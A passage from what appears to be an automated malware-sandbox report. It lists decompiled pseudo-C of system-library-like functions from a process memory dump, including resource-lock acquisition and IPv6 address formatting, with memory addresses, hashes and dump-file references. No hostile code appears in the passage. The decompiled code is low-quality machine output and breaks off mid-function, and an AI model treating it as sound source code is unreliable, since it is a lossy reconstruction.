									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E00A406BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E00A406BA(_t124, _t142) == 0 || E00A40A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                      0x00a40b21
                                                      0x00a40b24
                                                      0x00a40b27
                                                      0x00a40b2a
                                                      0x00a40b2d
                                                      0x00a40b30
                                                      0x00a40b33
                                                      0x00a40b36
                                                      0x00a40b39
                                                      0x00a40b3e
                                                      0x00a40c65
                                                      0x00a40c68
                                                      0x00a40c6a
                                                      0x00a40c6f
                                                      0x00a6eb42
                                                      0x00000000
                                                      0x00000000
                                                      0x00a6eb48
                                                      0x00a6eb48
                                                      0x00a40c75
                                                      0x00a40c7a
                                                      0x00a6eb54
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00a6eb5a
                                                      0x00a40c80
                                                      0x00a40c84
                                                      0x00a6eb98
                                                      0x00000000
                                                      0x00000000
                                                      0x00a6eba6
                                                      0x00a40cb8
                                                      0x00a40cba
                                                      0x00a40cd3
                                                      0x00a40cda
                                                      0x00a40ce4
                                                      0x00a40ce9
                                                      0x00000000
                                                      0x00a40cec
                                                      0x00a40c8c
                                                      0x00a6eb63
                                                      0x00000000
                                                      0x00000000
                                                      0x00a6eb70
                                                      0x00a6eb75
                                                      0x00a6eb7d
                                                      0x00000000
                                                      0x00000000
                                                      0x00a6eb8c
                                                      0x00000000
                                                      0x00a6eb8c
                                                      0x00a40c96
                                                      0x00000000
                                                      0x00000000
                                                      0x00a40ca2
                                                      0x00a40cac
                                                      0x00a40cb4
                                                      0x00000000
                                                      0x00000000
                                                      0x00a40b44
                                                      0x00a40b47
                                                      0x00a40b49
                                                      0x00000000
                                                      0x00000000
                                                      0x00a40b4f
                                                      0x00a40b50
                                                      0x00000000
                                                      0x00000000
                                                      0x00a40b56
                                                      0x00a40b62
                                                      0x00a40b7c
                                                      0x00a40bac
                                                      0x00a40a0f
                                                      0x00a6eaaa
                                                      0x00000000
                                                      0x00a6eac4
                                                      0x00a6eac4
                                                      0x00a40bd0
                                                      0x00a40bd0
                                                      0x00a40bd4
                                                      0x00a40bd9
                                                      0x00000000
                                                      0x00000000
                                                      0x00a40bdb
                                                      0x00a40be0
                                                      0x00a6eb0e
                                                      0x00a40a1a
                                                      0x00000000
                                                      0x00a40a1a
                                                      0x00a6eb1a
                                                      0x00a6eb1f
                                                      0x00a6eb27
                                                      0x00000000
                                                      0x00000000
                                                      0x00a6eb36
                                                      0x00000000
                                                      0x00a6eb36
                                                      0x00a40bea
                                                      0x00000000
                                                      0x00000000
                                                      0x00a40bf6
                                                      0x00a40c00
                                                      0x00a40c03
                                                      0x00a40c0b
                                                      0x00000000
                                                      0x00a40c0b
                                                      0x00a6eaaa
                                                      0x00000000
                                                      0x00a40a15
                                                      0x00a40bb6
                                                      0x00000000
                                                      0x00a40bc6
                                                      0x00a40bc6
                                                      0x00a40bcb
                                                      0x00a40c15
                                                      0x00000000
                                                      0x00000000
                                                      0x00a40c1d
                                                      0x00a40c20
                                                      0x00a40c21
                                                      0x00a40c24
                                                      0x00a40c24
                                                      0x00a40c26
                                                      0x00000000
                                                      0x00a40c26
                                                      0x00a40bcd
                                                      0x00000000
                                                      0x00a40bcd
                                                      0x00a40b89
                                                      0x00a40b89
                                                      0x00a40b90
                                                      0x00000000
                                                      0x00000000
                                                      0x00a40b96
                                                      0x00000000
                                                      0x00a40b96
                                                      0x00a40a04
                                                      0x00a40a04
                                                      0x00a40b9a
                                                      0x00a40b9a
                                                      0x00a40b9b
                                                      0x00a40b9f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00a40ba5
                                                      0x00a40ac7
                                                      0x00a40aca
                                                      0x00a6eacf
                                                      0x00000000
                                                      0x00a6eade
                                                      0x00a6eade
                                                      0x00a6eae3
                                                      0x00000000
                                                      0x00000000
                                                      0x00a6eaf3
                                                      0x00a6eaf6
                                                      0x00a6eaf7
                                                      0x00a6eafe
                                                      0x00a6eb01
                                                      0x00000000
                                                      0x00a6eb01
                                                      0x00a6eacf
                                                      0x00a40ad0
                                                      0x00a40ad4
                                                      0x00000000
                                                      0x00000000
                                                      0x00a40ada
                                                      0x00a40ae6
                                                      0x00a40c34
                                                      0x00000000
                                                      0x00a40c47
                                                      0x00a40c49
                                                      0x00a40c4a
                                                      0x00a40c4e
                                                      0x00a40c51
                                                      0x00a40c54
                                                      0x00a40c57
                                                      0x00a40c5a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00a40c60
                                                      0x00a40afb
                                                      0x00a40afe
                                                      0x00a40b02
                                                      0x00a40b05
                                                      0x00a40b08
                                                      0x00000000
                                                      0x00a40b08
                                                      0x00a40ae6
                                                      0x00a40b44
                                                      0x00a409f8
                                                      0x00a409f8
                                                      0x00a409f9
                                                      0x00000000
                                                      0x00000000
                                                      0x00a6eaa0
                                                      0x00000000

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: __fassign
                                                      • String ID: .$:$:
                                                      • API String ID: 3965848254-2308638275
                                                      • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                      • Instruction ID: f214b70406de7362b1d73cde1ed0345798e7d126cc59d866e066e62151980aa1
                                                      • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                      • Instruction Fuzzy Hash: EDA1E179D0030ADFCF24DF64C880EBEB7B4EF95305F24856ADA42A7282D7349A41EB55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A40554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 49%
                                                      			E00A40554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00ae01c0;
									_push(_t144);
									_push(0);
									_t51 = E009FF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00A44FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00A53F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00A53F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00A8217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00A53F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00A43915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00ae01c0;
												_push(_t138);
												_push(0);
												_t58 = E009FF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00A44FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00A53F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00A53F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00A8217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00A53F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00A43915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00A25384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E009FF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00A43915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E009FF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00A43915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E009FF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00A43915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E00A25329(_t110, _t138);
																return E00A253A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}



































                                                      0x00a4055a
                                                      0x00a4055d
                                                      0x00a40563
                                                      0x00a40566
                                                      0x00a405d8
                                                      0x00a405e2
                                                      0x00a405e5
                                                      0x00000000
                                                      0x00a405e7
                                                      0x00a405e7
                                                      0x00a405ea
                                                      0x00a405f3
                                                      0x00a405f3
                                                      0x00a40568
                                                      0x00a40568
                                                      0x00a40568
                                                      0x00a40569
                                                      0x00a40569
                                                      0x00a40569
                                                      0x00a4056b
                                                      0x00000000
                                                      0x00000000
                                                      0x00a6217f
                                                      0x00a62183
                                                      0x00a6225b
                                                      0x00a6225f
                                                      0x00a62189
                                                      0x00a6218c
                                                      0x00a6218f
                                                      0x00a62194
                                                      0x00a62199
                                                      0x00a6219d
                                                      0x00a621a0
                                                      0x00a621a2
                                                      0x00a621ce
                                                      0x00a621ce
                                                      0x00a621ce
                                                      0x00a621d0
                                                      0x00a621d6
                                                      0x00a621de
                                                      0x00a621e2
                                                      0x00a621e8
                                                      0x00a621e9
                                                      0x00a621ec
                                                      0x00a621f1
                                                      0x00a621f6
                                                      0x00000000
                                                      0x00000000
                                                      0x00a621f8
                                                      0x00a621fb
                                                      0x00a62206
                                                      0x00a6220b
                                                      0x00a6220c
                                                      0x00a62217
                                                      0x00a62226
                                                      0x00a6222b
                                                      0x00a6222c
                                                      0x00a6222f
                                                      0x00a62232
                                                      0x00a62235
                                                      0x00a62235
                                                      0x00a6223a
                                                      0x00a6223f
                                                      0x00a62241
                                                      0x00a62243
                                                      0x00a62248
                                                      0x00a62248
                                                      0x00a6224d
                                                      0x00a6224f
                                                      0x00a62262
                                                      0x00a62263
                                                      0x00a62268
                                                      0x00a62269
                                                      0x00a62269
                                                      0x00a62269
                                                      0x00a6226d
                                                      0x00000000
                                                      0x00000000
                                                      0x00a62276
                                                      0x00a62279
                                                      0x00a6227e
                                                      0x00a62283
                                                      0x00a62287
                                                      0x00a6228a
                                                      0x00a6228d
                                                      0x00a6228f
                                                      0x00a622bc
                                                      0x00a622bc
                                                      0x00a622bc
                                                      0x00a622be
                                                      0x00a622c4
                                                      0x00a622cc
                                                      0x00a622d0
                                                      0x00a622d6
                                                      0x00a622d7
                                                      0x00a622da
                                                      0x00a622df
                                                      0x00a622e4
                                                      0x00000000
                                                      0x00000000
                                                      0x00a622e6
                                                      0x00a622e9
                                                      0x00a622f4
                                                      0x00a622f9
                                                      0x00a622fa
                                                      0x00a62305
                                                      0x00a62314
                                                      0x00a62319
                                                      0x00a6231a
                                                      0x00a6231d
                                                      0x00a62320
                                                      0x00a62323
                                                      0x00a62323
                                                      0x00a62328
                                                      0x00a6232d
                                                      0x00a6232f
                                                      0x00a62331
                                                      0x00a62336
                                                      0x00a62336
                                                      0x00a6233b
                                                      0x00a6233d
                                                      0x00a62350
                                                      0x00a62351
                                                      0x00a62356
                                                      0x00a62359
                                                      0x00a62359
                                                      0x00a6235b
                                                      0x00a6235d
                                                      0x00a25367
                                                      0x00a2536b
                                                      0x00a25372
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00a62363
                                                      0x00a62363
                                                      0x00a62369
                                                      0x00a6236a
                                                      0x00a6236c
                                                      0x00a62371
                                                      0x00a62373
                                                      0x00000000
                                                      0x00a62379
                                                      0x00a62379
                                                      0x00a6237a
                                                      0x00a6237f
                                                      0x00a6237f
                                                      0x00a62385
                                                      0x00a62386
                                                      0x00a62389
                                                      0x00a6238e
                                                      0x00a62390
                                                      0x00a25378
                                                      0x00a2537c
                                                      0x00a62396
                                                      0x00a62396
                                                      0x00a62397
                                                      0x00a6239c
                                                      0x00a623a2
                                                      0x00a623a3
                                                      0x00a623a6
                                                      0x00a623ab
                                                      0x00a623ad
                                                      0x00000000
                                                      0x00a623b3
                                                      0x00a623b3
                                                      0x00a623b4
                                                      0x00a623b9
                                                      0x00a623ba
                                                      0x00a623ba
                                                      0x00a623bc
                                                      0x00a623bf
                                                      0x00000000
                                                      0x00000000
                                                      0x00a59153
                                                      0x00a59158
                                                      0x00a5915a
                                                      0x00a5915e
                                                      0x00a59160
                                                      0x00000000
                                                      0x00a59166
                                                      0x00a59166
                                                      0x00a59171
                                                      0x00a59176
                                                      0x00a59176
                                                      0x00000000
                                                      0x00a59160
                                                      0x00a623c6
                                                      0x00a623d7
                                                      0x00a623d7
                                                      0x00a623ad
                                                      0x00a62390
                                                      0x00a62373
                                                      0x00a6233f
                                                      0x00a6233f
                                                      0x00000000
                                                      0x00a6233f
                                                      0x00a62291
                                                      0x00a62291
                                                      0x00a62293
                                                      0x00a62295
                                                      0x00a6229a
                                                      0x00a622a1
                                                      0x00a622a3
                                                      0x00a622a7
                                                      0x00a622a9
                                                      0x00000000
                                                      0x00000000
                                                      0x00a622ab
                                                      0x00a622ad
                                                      0x00a622af
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00a622af
                                                      0x00a622b1
                                                      0x00a622b4
                                                      0x00a622b4
                                                      0x00a622b6
                                                      0x00a253be
                                                      0x00a253be
                                                      0x00a253be
                                                      0x00a253c0
                                                      0x00000000
                                                      0x00000000
                                                      0x00a253cb
                                                      0x00a253ce
                                                      0x00a253d0
                                                      0x00a253d4
                                                      0x00a253d6
                                                      0x00000000
                                                      0x00a253d8
                                                      0x00a253e3
                                                      0x00a253ea
                                                      0x00a253ea
                                                      0x00000000
                                                      0x00a253d6
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00a622b6
                                                      0x00000000
                                                      0x00a6228f
                                                      0x00a62349
                                                      0x00a6234d
                                                      0x00a62251
                                                      0x00a62251
                                                      0x00000000
                                                      0x00a62251
                                                      0x00a621a4
                                                      0x00a621a4
                                                      0x00a621a6
                                                      0x00a621a8
                                                      0x00a621ac
                                                      0x00a621b6
                                                      0x00a621b8
                                                      0x00a621bc
                                                      0x00a621be
                                                      0x00000000
                                                      0x00000000
                                                      0x00a621c0
                                                      0x00a621c2
                                                      0x00a621c4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00a621c4
                                                      0x00a621c6
                                                      0x00a621c6
                                                      0x00a621c8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00a621c8
                                                      0x00a621a2
                                                      0x00000000
                                                      0x00a62183
                                                      0x00a4057b
                                                      0x00a4057d
                                                      0x00a40581
                                                      0x00a40583
                                                      0x00a62178
                                                      0x00000000
                                                      0x00a40589
                                                      0x00a4058f
                                                      0x00a4058f
                                                      0x00a40583
                                                      0x00000000

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A62206
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-4236105082
                                                      • Opcode ID: 781a1b69360d6f49643acbc4a775e0451bde6af0257712ca7202d246bd272aa8
                                                      • Instruction ID: f510b12933ad2fa97dbec47dec43746e63c9951263ebfc88f77ee9bb51981f30
                                                      • Opcode Fuzzy Hash: 781a1b69360d6f49643acbc4a775e0451bde6af0257712ca7202d246bd272aa8
                                                      • Instruction Fuzzy Hash: EE513776B046016BEB148B28CC81FA633B9AFD8721F218229FD19DF285DA71EC458790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A414C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 64%
                                                      			E00A414C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xae2088; // 0x7663e5d0
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00A37707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E00A413CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00A37707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00A37707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00A02340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E00A0E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                      0x00a414c0
                                                      0x00a414cb
                                                      0x00a414d2
                                                      0x00a414d6
                                                      0x00a414da
                                                      0x00a414de
                                                      0x00a414e3
                                                      0x00a4157a
                                                      0x00a4157a
                                                      0x00a414f1
                                                      0x00a414f3
                                                      0x00a6ea0f
                                                      0x00000000
                                                      0x00a6ea15
                                                      0x00000000
                                                      0x00a6ea15
                                                      0x00a414f9
                                                      0x00a414f9
                                                      0x00a414fe
                                                      0x00a41504
                                                      0x00a6ea1a
                                                      0x00a6ea1f
                                                      0x00a6ea21
                                                      0x00a6ea22
                                                      0x00a6ea27
                                                      0x00a6ea2a
                                                      0x00a6ea2a
                                                      0x00a41515
                                                      0x00a41517
                                                      0x00a4156d
                                                      0x00a41572
                                                      0x00a41575
                                                      0x00a41575
                                                      0x00a4151e
                                                      0x00a6ea50
                                                      0x00a6ea55
                                                      0x00a6ea58
                                                      0x00a6ea58
                                                      0x00a4152e
                                                      0x00a41531
                                                      0x00a41533
                                                      0x00000000
                                                      0x00a41535
                                                      0x00a41541
                                                      0x00a41549
                                                      0x00a41549
                                                      0x00a41533
                                                      0x00a414f3
                                                      0x00a41559

                                                      APIs
                                                      • ___swprintf_l.LIBCMT ref: 00A6EA22
                                                        • Part of subcall function 00A413CB: ___swprintf_l.LIBCMT ref: 00A4146B
                                                        • Part of subcall function 00A413CB: ___swprintf_l.LIBCMT ref: 00A41490
                                                      • ___swprintf_l.LIBCMT ref: 00A4156D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: 51a8652c59c22a7516413e0fb304eab5a58354704f8ea3c2f54e70480d0afc98
                                                      • Instruction ID: efdad50921c4c877daf2fb7c32043ae97c7b81124c2e442e3c97a1f6eb79cfab
                                                      • Opcode Fuzzy Hash: 51a8652c59c22a7516413e0fb304eab5a58354704f8ea3c2f54e70480d0afc98
                                                      • Instruction Fuzzy Hash: 2721A576900219ABCF20DF54DD45AEFB3BCBB90700F544555FC5AD3141EB70AA988BE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A253A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 44%
                                                      			E00A253A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
